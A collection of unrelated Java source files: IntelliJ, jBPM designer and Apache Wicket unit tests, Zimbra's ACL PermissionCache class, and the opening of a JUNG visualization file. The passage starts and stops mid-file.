final PsiClass aClass = ((PsiMethod)method).getContainingClass();
assertNotNull(aClass);
assertEquals("A", aClass.getName());
}
public void testMethodImplementationsOnTypeVariable() throws Exception {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface I {}\n" +
"interface Im {\n" +
" void m();\n" +
"}\n" +
"class Im1 implements Im {\n" +
" public void m() {}\n" +
"}\n" +
"class Im2 implements Im {\n" +
" public void m() {}\n" +
"}\n" +
"class JavaClass<T extends K, K extends I & Im> {\n" +
" void a(T t){\n" +
" t.<caret>m();\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
PsiElement[] targets = getTargets(file);
assertSize(2, targets);
}
public void testStaticMethodReference() {
PsiFile file = myFixture.addFileToProject("Foo.java",
"class C {\n" +
" static void a(){}\n" +
" {a<caret>();}" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(1, impls.length);
}
public void testPrivateClassInheritors() {
PsiFile file = myFixture.addFileToProject("Foo.java",
"class C {\n" +
" private static class Pr<caret>ivate {}\n" +
" public static class Public extends Private {}" +
"}");
myFixture.addClass("class Inheritor extends C.Public {}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
assertSize(2, getTargets(file));
}
public void testPrivateClassInheritorsInJdkDecompiled() {
ModuleRootModificationUtil.setModuleSdk(myModule, IdeaTestUtil.getMockJdk18());
PsiClass aClass = myFixture.getJavaFacade().findClass("java.util.ResourceBundle.CacheKeyReference");
PsiFile file = aClass.getContainingFile();
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
myFixture.getEditor().getCaretModel().moveToOffset(aClass.getTextOffset());
assertSize(2, getTargets(file));
}
private PsiElement[] getTargets(PsiFile file) {
GotoTargetHandler.GotoData gotoData = CodeInsightTestUtil.gotoImplementation(myFixture.getEditor(), file);
assertNotNull(gotoData);
return gotoData.targets;
}
}
|
|
/*
* Copyright 2017 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jbpm.designer.client;
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;
import org.guvnor.common.services.project.client.context.WorkspaceProjectContext;
import org.guvnor.common.services.project.client.security.ProjectController;
import org.guvnor.common.services.project.model.WorkspaceProject;
import org.guvnor.common.services.shared.metadata.model.Overview;
import org.guvnor.messageconsole.client.console.widget.button.AlertsButtonMenuItemBuilder;
import org.jboss.errai.common.client.api.RemoteCallback;
import org.jbpm.designer.client.parameters.DesignerEditorParametersPublisher;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.kie.workbench.common.widgets.client.menu.FileMenuBuilderImpl;
import org.kie.workbench.common.widgets.metadata.client.validation.AssetUpdateValidator;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.Spy;
import org.mockito.runners.MockitoJUnitRunner;
import org.uberfire.backend.vfs.ObservablePath;
import org.uberfire.backend.vfs.Path;
import org.uberfire.client.promise.Promises;
import org.uberfire.ext.editor.commons.client.BaseEditorView;
import org.uberfire.ext.editor.commons.client.file.CommandWithFileNameAndCommitMessage;
import org.uberfire.ext.editor.commons.client.file.FileNameAndCommitMessage;
import org.uberfire.ext.editor.commons.client.file.popups.RenamePopUpPresenter;
import org.uberfire.ext.editor.commons.client.history.VersionRecordManager;
import org.uberfire.ext.editor.commons.client.menu.BasicFileMenuBuilder;
import org.uberfire.ext.editor.commons.client.validation.DefaultFileNameValidator;
import org.uberfire.ext.editor.commons.service.RenameService;
import org.uberfire.ext.widgets.common.client.callbacks.HasBusyIndicatorDefaultErrorCallback;
import org.uberfire.mocks.CallerMock;
import org.uberfire.mvp.Command;
import org.uberfire.promise.SyncPromises;
import org.uberfire.workbench.model.menu.MenuItem;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import static org.mockito.Mockito.any;
import static org.mockito.Mockito.doNothing;
import static org.mockito.Mockito.doReturn;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.never;
import static org.mockito.Mockito.spy;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
@RunWith(MockitoJUnitRunner.class)
public class DesignerPresenterTest {
@Mock
protected BasicFileMenuBuilder menuBuilder;
@Mock
protected VersionRecordManager versionRecordManager;
@Spy
@InjectMocks
protected FileMenuBuilderImpl fileMenuBuilder;
@Mock
protected ProjectController projectController;
@Mock
protected WorkspaceProjectContext workbenchContext;
@Mock
private RenameService renameService;
private CallerMock<RenameService> renameServiceCaller;
@Mock
private DesignerView view;
@Mock
private Overview overview;
@Mock
private DesignerEditorParametersPublisher designerEditorParametersPublisher;
@Mock
private RenamePopUpPresenter renamePopUpPresenter;
@Mock
private DefaultFileNameValidator fileNameValidator;
@Mock
private BaseEditorView baseView;
@Mock
private AlertsButtonMenuItemBuilder alertsButtonMenuItemBuilder;
private Promises promises;
@Mock
private MenuItem alertsButtonMenuItem;
@Spy
private Map<String, String> parameters = new HashMap<>();
private DesignerPresenter presenter;
@Before
public void setup() {
promises = new SyncPromises();
when(alertsButtonMenuItemBuilder.build()).thenReturn(alertsButtonMenuItem);
renameServiceCaller = new CallerMock<>(renameService);
presenter = spy(new DesignerPresenter(view) {
{
this.fileMenuBuilder = DesignerPresenterTest.this.fileMenuBuilder;
this.projectController = DesignerPresenterTest.this.projectController;
this.workbenchContext = DesignerPresenterTest.this.workbenchContext;
this.versionRecordManager = DesignerPresenterTest.this.versionRecordManager;
this.designerEditorParametersPublisher = DesignerPresenterTest.this.designerEditorParametersPublisher;
this.renamePopUpPresenter = DesignerPresenterTest.this.renamePopUpPresenter;
this.fileNameValidator = DesignerPresenterTest.this.fileNameValidator;
this.baseView = DesignerPresenterTest.this.baseView;
this.alertsButtonMenuItemBuilder = DesignerPresenterTest.this.alertsButtonMenuItemBuilder;
this.promises = DesignerPresenterTest.this.promises;
}
@Override
protected void resetEditorPages(final Overview overview) {
}
});
doReturn(Optional.of(mock(WorkspaceProject.class))).when(workbenchContext).getActiveWorkspaceProject();
}
@Test
public void testSetup() {
String id = "testId";
presenter.setup(parameters,
id,
overview);
verify(parameters,
times(1)).put("readonly",
"false");
verify(designerEditorParametersPublisher,
times(1)).publish(parameters);
verify(view,
times(1)).setup(id,
parameters);
assertEquals(1,
parameters.size());
assertTrue(parameters.containsKey("readonly"));
}
@Test
public void testMakeMenuBar() {
doReturn(Optional.of(mock(WorkspaceProject.class))).when(workbenchContext).getActiveWorkspaceProject();
doReturn(promises.resolve(true)).when(projectController).canUpdateProject(any());
presenter.makeMenuBar();
verify(fileMenuBuilder).addSave(any(MenuItem.class));
verify(fileMenuBuilder).addCopy(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder).addRename(any(Command.class));
verify(fileMenuBuilder).addDelete(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder).addNewTopLevelMenu(alertsButtonMenuItem);
}
@Test
public void testMakeMenuBarWithoutUpdateProjectPermission() {
doReturn(Optional.of(mock(WorkspaceProject.class))).when(workbenchContext).getActiveWorkspaceProject();
doReturn(promises.resolve(false)).when(projectController).canUpdateProject(any());
presenter.makeMenuBar();
verify(fileMenuBuilder,
never()).addSave(any(MenuItem.class));
verify(fileMenuBuilder,
never()).addCopy(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder,
never()).addRename(any(Command.class));
verify(fileMenuBuilder,
never()).addDelete(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder).addNewTopLevelMenu(alertsButtonMenuItem);
}
@Test
public void testGetSaveAndRenameWhenAssetIsDirty() {
final String title = "title";
final String message = "message";
final Command doSaveAndRename = mock(Command.class);
final Command doRename = mock(Command.class);
doReturn(true).when(presenter).isDirty();
doReturn(title).when(presenter).getPopupTitle();
doReturn(message).when(presenter).getMessage();
doReturn(doSaveAndRename).when(presenter).doSaveAndRename();
doReturn(doRename).when(presenter).doRename();
presenter.getSaveAndRename().execute();
verify(view).showYesNoCancelPopup(title, message, doSaveAndRename, doRename);
}
@Test
public void testGetSaveAndRenameWhenAssetIsNotDirty() {
final Command doRename = mock(Command.class);
doReturn(false).when(presenter).isDirty();
doReturn(doRename).when(presenter).doRename();
presenter.getSaveAndRename().execute();
verify(doRename).execute();
}
@Test
public void testIsDirtyWhenDesignerModelCanBeSaved() {
doReturn(true).when(view).canSaveDesignerModel();
assertFalse(presenter.isDirty());
}
@Test
public void testIsDirtyWhenDesignerModelCannotBeSaved() {
doReturn(false).when(view).canSaveDesignerModel();
assertTrue(presenter.isDirty());
}
@Test
public void testDoSaveAndRename() {
final Command command = mock(Command.class);
doReturn(command).when(presenter).doRename();
doNothing().when(presenter).save(any());
presenter.doSaveAndRename().execute();
verify(presenter).save(command);
}
@Test
public void testDoRename() {
doNothing().when(presenter).openRenamePopUp(any());
presenter.doRename().execute();
verify(presenter).openRenamePopUp(any());
}
@Test
public void testOpenRenamePopUp() {
final ObservablePath observablePath = mock(ObservablePath.class);
final CommandWithFileNameAndCommitMessage command = mock(CommandWithFileNameAndCommitMessage.class);
doReturn(command).when(presenter).makeRenameCommand();
presenter.openRenamePopUp(observablePath);
verify(renamePopUpPresenter).show(observablePath, fileNameValidator, command);
}
@Test
public void testMakeRenameCommand() {
final FileNameAndCommitMessage details = mock(FileNameAndCommitMessage.class);
final ObservablePath observablePath = mock(ObservablePath.class);
final RemoteCallback successCallback = mock(RemoteCallback.class);
final HasBusyIndicatorDefaultErrorCallback errorCallback = mock(HasBusyIndicatorDefaultErrorCallback.class);
final String newFileName = "newFileName";
final String message = "message";
doReturn(newFileName).when(details).getNewFileName();
doReturn(message).when(details).getCommitMessage();
doReturn(observablePath).when(versionRecordManager).getPathToLatest();
doReturn(renameServiceCaller).when(presenter).getRenameService();
doReturn(successCallback).when(presenter).getRenameSuccessCallback(any());
doReturn(errorCallback).when(presenter).getRenameErrorCallback(any());
presenter.makeRenameCommand().execute(details);
verify(renameService).rename(observablePath, newFileName, message);
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.wicket.markup.html;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.containsString;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.junit.jupiter.api.Assertions.fail;
import org.apache.wicket.Component;
import org.apache.wicket.IPageManagerProvider;
import org.apache.wicket.MarkupContainer;
import org.apache.wicket.Page;
import org.apache.wicket.ajax.AjaxRequestTarget;
import org.apache.wicket.ajax.markup.html.AjaxLink;
import org.apache.wicket.core.util.lang.WicketObjects;
import org.apache.wicket.markup.IMarkupResourceStreamProvider;
import org.apache.wicket.markup.MarkupException;
import org.apache.wicket.markup.html.basic.Label;
import org.apache.wicket.markup.html.border.Border;
import org.apache.wicket.markup.html.internal.HtmlHeaderContainer;
import org.apache.wicket.markup.html.panel.Fragment;
import org.apache.wicket.mock.MockPageManager;
import org.apache.wicket.page.IManageablePage;
import org.apache.wicket.page.IPageManager;
import org.apache.wicket.pageStore.IPageContext;
import org.apache.wicket.request.mapper.parameter.PageParameters;
import org.apache.wicket.util.resource.IResourceStream;
import org.apache.wicket.util.resource.StringResourceStream;
import org.apache.wicket.util.tester.WicketTestCase;
import org.apache.wicket.util.tester.WicketTester;
import org.junit.jupiter.api.Test;
/**
* @author Pedro Santos
*/
public class TransparentWebMarkupContainerTest extends WicketTestCase
{
/**
* WICKET-3512
*
* @throws Exception
*/
@Test
void markupInheritanceResolver() throws Exception
{
executeTest(MarkupInheritanceResolverTestPage3.class,
"MarkupInheritanceResolverTestPage_expected.html");
}
/**
*
*/
@Test
void unableToFindComponents()
{
try
{
tester.startPage(TestPage.class);
fail();
}
catch (MarkupException e)
{
assertTrue(e.getMessage().contains("Unable to find component with id 'c1'"), e.getMessage());
}
}
/**
* Test if the render is OK even if users define its own component with the same id
* WicketTagIdentifier is generation for internal components.
*/
@Test
void usingGeneratedWicketIdAreSafe1()
{
tester.startPage(TestPage2.class);
assertTrue(tester.getLastResponseAsString().contains("test_message"));
}
/**
* Same test in different scenario
*/
@Test
void usingGeneratedWicketIdAreSafe2()
{
tester.startPage(TestPage3.class);
String expected = tester.getApplication()
.getResourceSettings()
.getLocalizer()
.getString("null", null);
assertTrue(tester.getLastResponseAsString().contains(expected));
}
/**
* Test case for <a href="https://issues.apache.org/jira/browse/WICKET-3719">WICKET-3719</a>
*/
@Test
void ajaxUpdate()
{
WicketTester wicketTester = new WicketTester()
{
@Override
protected IPageManagerProvider newTestPageManagerProvider()
{
return new IPageManagerProvider()
{
@Override
public IPageManager get()
{
return new MockPageManager()
{
@Override
public void touchPage(IManageablePage page)
{
page = WicketObjects.cloneObject(page);
super.touchPage(page);
}
};
}
};
}
};
wicketTester.startPage(TransparentWithAjaxUpdatePage.class);
wicketTester.clickLink("link", true);
wicketTester.destroy();
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by Wicket's
* insertion of a TransparentWebMarkupContainer automatically due to a {@code src} attribute
* that might need rewriting.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow()
{
tester.startPage(SingleNestedTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(SingleNestedTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having two
* TransparentWebMarkupContainers nested and trying to update a label that was added to the
* outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow2()
{
tester.startPage(DoubleNestedTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(DoubleNestedTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having two
* TransparentWebMarkupContainers nested, and where a TWMC exist inside a sibling web markup
* container and trying to update a label that was added to the outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow3()
{
tester.startPage(DoubleNestedTransparentContainerWithSiblingTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(DoubleNestedTransparentContainerWithSiblingTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having
* introduce automatic transparent containers inside some link components due to a
* {@code <img src="">} tag inside the link tags, and trying to update a label that was added to
* the outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow4()
{
tester.startPage(TransparentContainerWithAutoTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(TransparentContainerWithAutoTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having
* manually added transparent containers inside some link components, and trying to update a
* label that was added to the outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow5()
{
tester.startPage(TransparentContainerWithManualTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(TransparentContainerWithManualTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* https://issues.apache.org/jira/browse/WICKET-5941
*
* Headers not rendered for components inside TransparentWebMarkupContainer on ajax update
*/
@Test
void updateAjaxUpdateOfTransparentContainer() throws Exception
{
TestEmbeddedAjaxComponet page = new TestEmbeddedAjaxComponet();
tester.startPage(page);
assertEquals(2, page.renderHeadCount);
tester.clickLink("container:updateTransparentContainer", true);
assertEquals(4, page.renderHeadCount);
}
@Test
void updateAjaxUpdateOfContainerWithTransparentContainer() throws Exception
{
TestEmbeddedAjaxComponet page = new TestEmbeddedAjaxComponet();
tester.startPage(page);
assertEquals(2, page.renderHeadCount);
tester.clickLink("container:updateContainer", true);
assertEquals(4, page.renderHeadCount);
}
@Test
void nestedTransparentContainer() throws Exception
{
tester.startPage(TestEmbeddedTransparentMarkupContainer.class);
tester.assertRenderedPage(TestEmbeddedTransparentMarkupContainer.class);
final Page page = tester.getLastRenderedPage();
final Component label = page.get("label");
assertEquals(TestEmbeddedTransparentMarkupContainer.LABEL_MARKUP,
label.getMarkup().toString(true));
}
/**
* https://issues.apache.org/jira/browse/WICKET-6219
*/
@Test
void shouldAllowAFragmentIdConflictingToASibilingTagWicketId() throws Exception
{
tester.startPage(SubPageWithAFragment.class);
assertThat(tester.getLastResponseAsString(), containsString("content"));
}
/** */
public static class TestPage extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
/** */
public TestPage()
{
add(new TestBorder("border"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"border\">" + //
" <div wicket:id=\"c1\"></div>" + // component is only at the markup
" </div>" + //
"</body></html>");
}
}
private static class TestBorder extends Border implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
private TestBorder(String id)
{
super(id);
addToBorder(new Label("c1", "some border title"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream(
"<wicket:border><div wicket:id=\"c1\"></div><wicket:body /></wicket:border>");
}
}
/** */
public static class TestPage2 extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
/** */
public TestPage2()
{
add(new Label("_wicket_enclosure"));
add(new TransparentWebMarkupContainer("container").add(new Label("msg", "test_message")));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"_wicket_enclosure\"></div>" + //
" <div wicket:id=\"container\">" + //
" <wicket:enclosure child=\"msg\">" + //
" <span wicket:id=\"msg\"></span>" + //
" </wicket:enclosure>" + //
" </div>" + //
"</body></html>");
}
}
/** */
public static class TestPage3 extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
/** */
public TestPage3()
{
add(new WebComponent("_wicket_message"));
add(new TransparentWebMarkupContainer("container"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"_wicket_message\"></div>" + //
" <div wicket:id=\"container\">" + //
" <wicket:message key=\"null\" />" + //
" </div>" + //
"</body></html>");
}
}
public static class TestEmbeddedAjaxComponet extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
int renderHeadCount = 0;
/** */
TestEmbeddedAjaxComponet()
{
final WebMarkupContainer container = new WebMarkupContainer("container");
container.setOutputMarkupId(true);
add(container);
final Component transparentContainer = new TransparentWebMarkupContainer("transparentContainer").setOutputMarkupId(true);
container.add(transparentContainer);
container.add(new AjaxLink<Void>("updateContainer"){
@Override
public void internalRenderHead(HtmlHeaderContainer container)
{
super.internalRenderHead(container);
renderHeadCount++;
}
@Override
public void onClick(AjaxRequestTarget target)
{
target.add(container);
}
});
container.add(new AjaxLink<Void>("updateTransparentContainer"){
@Override
public void internalRenderHead(HtmlHeaderContainer container)
{
super.internalRenderHead(container);
renderHeadCount++;
}
@Override
public void onClick(AjaxRequestTarget target)
{
target.add(transparentContainer);
}
});
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"container\">" + //
" <div wicket:id=\"transparentContainer\">" + //
" <a wicket:id=\"updateContainer\"></a>" + //
" <a wicket:id=\"updateTransparentContainer\"></a>" + //
" </div>" + //
" </div>" + //
"</body></html>");
}
}
public static class TestEmbeddedTransparentMarkupContainer extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
static final String LABEL_MARKUP = "<span wicket:id=\"label\"></span>";
/** */
public TestEmbeddedTransparentMarkupContainer()
{
add(new TransparentWebMarkupContainer("outer"));
add(new TransparentWebMarkupContainer("inner"));
add(new Label("label"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"outer\">" + //
" <div wicket:id=\"inner\">" + //
" " + LABEL_MARKUP + //
" </div>" + //
" </div>" + //
"</body></html>");
}
}
public static class PageWithAChildInsideATransparentContainer extends WebPage
implements
IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
public PageWithAChildInsideATransparentContainer(PageParameters parameters)
{
super(parameters);
add(new TransparentWebMarkupContainer("wrapper"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"wrapper\">" + //
" <wicket:child/>" + //
" </div>" + //
"</body></html>");
}
}
public static class SubPageWithAFragment extends PageWithAChildInsideATransparentContainer
{
private static final long serialVersionUID = 1L;
public SubPageWithAFragment(PageParameters parameters)
{
super(parameters);
Fragment fragment = new Fragment("header", "header", this);
add(fragment);
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
if (PageWithAChildInsideATransparentContainer.class.equals(containerClass))
return super.getMarkupResourceStream(container, containerClass);
return new StringResourceStream("" + //
"<html><body>" + //
"<wicket:extend>" + //
" <div wicket:id=\"header\"></div>" + //
" <wicket:fragment wicket:id=\"header\">content</wicket:fragment>" + //
"</wicket:extend>" + //
"</body></html>");
}
}
}
|
|
/*
* ***** BEGIN LICENSE BLOCK *****
* Zimbra Collaboration Suite Server
* Copyright (C) 2010 Zimbra, Inc.
*
* The contents of this file are subject to the Zimbra Public License
* Version 1.3 ("License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
* http://www.zimbra.com/license.
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied.
* ***** END LICENSE BLOCK *****
*/
package com.zimbra.cs.account.accesscontrol;
import com.zimbra.common.localconfig.LC;
import com.zimbra.common.service.ServiceException;
import com.zimbra.common.util.ZimbraLog;
import com.zimbra.cs.account.Account;
import com.zimbra.cs.account.Entry;
import com.zimbra.cs.account.GuestAccount;
import com.zimbra.cs.account.Provisioning;
import com.zimbra.cs.account.accesscontrol.Rights.Admin;
import com.zimbra.soap.admin.type.CacheEntryType;
public class PermissionCache {
private static boolean cacheEnabled = LC.acl_cache_enabled.booleanValue();
enum CachedPermission {
NOT_CACHED(null, (short)0),
NO_MATCHING_ACL(null, PermCacheManager.CachedPerms.MASK_NO_MATCHING_ACL),
ALLOWED(Boolean.TRUE, PermCacheManager.CachedPerms.MASK_ALLOWED),
DENIED(Boolean.FALSE, PermCacheManager.CachedPerms.MASK_DENIED);
private Boolean result;
private short cacheMask;
private CachedPermission(Boolean result, short cacheMask) {
this.result = result;
this.cacheMask = cacheMask;
}
Boolean getResult() {
assert(this != NOT_CACHED);
return result;
}
short getCacheMask() {
return cacheMask;
}
}
public static void invalidateCache() {
PermCacheManager.getInstance().invalidateCache();
}
/**
* Invoked from the milter server/JVM.
*
     * In addition to invalidating the permission cache, we also need to
     * invalidate the account, aclgroup, domain, and globalgrant LDAP entry caches
     * where the ACL is cached.
     * On the mailbox server those caches are updated automatically when the
     * modification (grant, revoke, member changes, group/account/domain
     * creation/deletion, etc.) happens.
*/
public static void invalidateAllCache() {
// clear all LDAP entry caches
Provisioning prov = Provisioning.getInstance();
try {
prov.flushCache(CacheEntryType.all, null);
} catch (ServiceException e) {
ZimbraLog.acl.warn("unable to flush cache", e);
}
// clear the permission cache
invalidateCache();
}
public static void invalidateCache(Entry target) {
PermCacheManager.getInstance().invalidateCache(target);
}
public static double getHitRate() {
return PermCacheManager.getInstance().getHitRate();
}
static CachedPermission cacheGet(Account grantee, Entry target, Right rightNeeded, boolean canDelegateNeeded) {
if (!cacheEnabled) {
return CachedPermission.NOT_CACHED;
}
String cacheKey = buildCacheKey(grantee, rightNeeded, canDelegateNeeded);
if (cacheKey == null) {
// not cachable
return CachedPermission.NOT_CACHED;
}
CachedPermission perm = PermCacheManager.getInstance().get(target, cacheKey, rightNeeded);
if (ZimbraLog.acl.isDebugEnabled()) {
ZimbraLog.acl.debug("PermissionCache get: " + perm.toString() +
" (target=" + target.getLabel() + ", grantee=" + grantee.getName() +
", right=" + rightNeeded.getName() + ", canDelegateNeeded=" + canDelegateNeeded + ")");
}
return perm;
}
static void cachePut(Account grantee, Entry target, Right rightNeeded, boolean canDelegateNeeded,
Boolean allowed) {
if (!cacheEnabled) {
return;
}
String cacheKey = buildCacheKey(grantee, rightNeeded, canDelegateNeeded);
if (cacheKey == null) {
return; // not cacheable
}
CachedPermission perm = (allowed == null) ? CachedPermission.NO_MATCHING_ACL :
allowed.booleanValue() ? CachedPermission.ALLOWED : CachedPermission.DENIED;
PermCacheManager.getInstance().put(target, cacheKey, rightNeeded, perm);
if (ZimbraLog.acl.isDebugEnabled()) {
ZimbraLog.acl.debug("PermissionCache put: " + perm.toString() +
" (target=" + target.getLabel() + ", grantee=" + grantee.getName() +
", right=" + rightNeeded.getName() + ", canDelegateNeeded=" + canDelegateNeeded + ")");
}
}
    /*
     * Returns the cache key for entries in the permission map cached on the target entry.
     * The cache key is in the format:
     *
     * <GRANTEE-IDENTIFIER><ADMIN-FLAG><CAN-DELEGATE-NEEDED>
     *
     * GRANTEE-IDENTIFIER := <GUEST-ACCOUNT-BY-USER-PASS>|<GUEST-ACCOUNT-BY-ACCESSKEY>|<zimbra-account-id>
     *
     * GUEST-ACCOUNT-BY-USER-PASS := <user-pass-digest>G
     *
     * GUEST-ACCOUNT-BY-ACCESSKEY := <accesskey>K
     *
     * ADMIN-FLAG := <USER-FLAG>|<DELEGATED-ADMIN-FLAG>|<GLOBAL-ADMIN-FLAG>
     *
     * USER-FLAG := 0
     *
     * DELEGATED-ADMIN-FLAG := 1
     *
     * GLOBAL-ADMIN-FLAG := 2
     *
     * CAN-DELEGATE-NEEDED := 0 | 1
     *
     * e.g.
     * (no space in between segments in the actual key)
     * d3a5c239-bac9-45ca-87b3-441a990c931b 0 0
     * cv30B19SfmLg1HYQd2CX4qZp908=G 0 0
     */
static String buildCacheKey(Account grantee, Right rightNeeded, boolean canDelegateNeeded) {
if (!rightNeeded.isCacheable())
return null;
//
// to conserve caching slots, cache only user rights and the adminLoginAs admin right
// sanity check in case someone marks arbitrary admin rights cacheable in right xml files
//
if (!rightNeeded.isUserRight() && Admin.R_adminLoginAs != rightNeeded)
return null;
String id = null;
if (grantee instanceof GuestAccount) {
// note: do NOT use account id as part of the cache key for GuestAccount,
// the account id is always 999...
// put "G"/"K" at the end (instead of the beginning) for better key distribution for the hash
id = ((GuestAccount) grantee).getDigest();
if (id != null) {
id = id + "G";
} else {
id = ((GuestAccount) grantee).getAccessKey();
if (id != null) {
id = id + "K";
}
}
} else {
id = grantee.getId();
}
if (id == null) {
// for some weird reason, there is no identifier for the accessing account
ZimbraLog.acl.debug("unable to build cache key: " + grantee.getName());
return null;
}
char adminFlag = grantee.isIsAdminAccount() ? '2' : grantee.isIsDelegatedAdminAccount() ? '1' : '0';
char canDelegate = canDelegateNeeded ? '1' : '0';
return id + adminFlag + canDelegate;
}
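    /*
     * Illustrative example (editor's sketch, not in the original source): for a non-guest
     * delegated-admin grantee with id "d3a5c239-bac9-45ca-87b3-441a990c931b" and
     * canDelegateNeeded == true, buildCacheKey returns
     *
     *     "d3a5c239-bac9-45ca-87b3-441a990c931b" + '1' + '1'
     *
     * i.e. <GRANTEE-IDENTIFIER><ADMIN-FLAG><CAN-DELEGATE-NEEDED> as described above.
     */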
}
|
|
/*
* Copyright (c) 2003, the JUNG Project and the Regents of the University of
* California All rights reserved.
*
* This software is open-source under the BSD license; see either "license.txt"
* or http://jung.sourceforge.net/license.txt for a description.
*
* Created on Jul 20, 2004
*/
package edu.uci.ics.jung.visualization;
import java.awt.Shape;
import java.awt.geom.AffineTransform;
import java.awt.geom.Ellipse2D;
import java.awt.geom.GeneralPath;
